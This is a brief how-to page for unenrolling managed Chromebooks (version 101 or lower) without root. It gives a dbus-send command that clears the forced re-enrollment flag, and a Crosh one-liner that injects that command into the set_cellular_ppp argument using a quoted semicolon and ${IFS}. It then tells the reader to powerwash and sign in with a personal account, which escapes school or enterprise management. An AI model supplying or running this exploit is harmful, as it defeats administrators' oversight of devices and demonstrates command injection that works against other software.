Skip to content

Rootless Unenrollment (≤v101)

Requirements

  • Crosh access
  • Version 101 or lower

Guide

Run this as chronos:

dbus-send --system --print-reply --dest=org.chromium.SessionManager /org/chromium/SessionManager org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd

Or a funny one-liner for Crosh:

set_cellular_ppp \';dbus-send${IFS}--system${IFS}--print-reply${IFS}--dest=org.chromium.SessionManager${IFS}/org/chromium/SessionManager${IFS}org.chromium.SessionManagerInterface.ClearForcedReEnrollmentVpd;exit;\'

If successful, the command will return method return and some other data after that. Powerwash your Chromebook and log in with a personal email. On devices without FWMP, you will also have the option to enter developer mode immediately.

- OlyB